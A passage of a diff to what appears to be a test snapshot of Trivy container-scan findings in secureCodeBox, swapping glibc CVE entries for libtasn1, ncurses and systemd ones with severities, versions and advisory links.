"https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", + }, + { + "type": "URL", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + }, + { + "type": "URL", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-5707-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213488", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5477-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6099-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 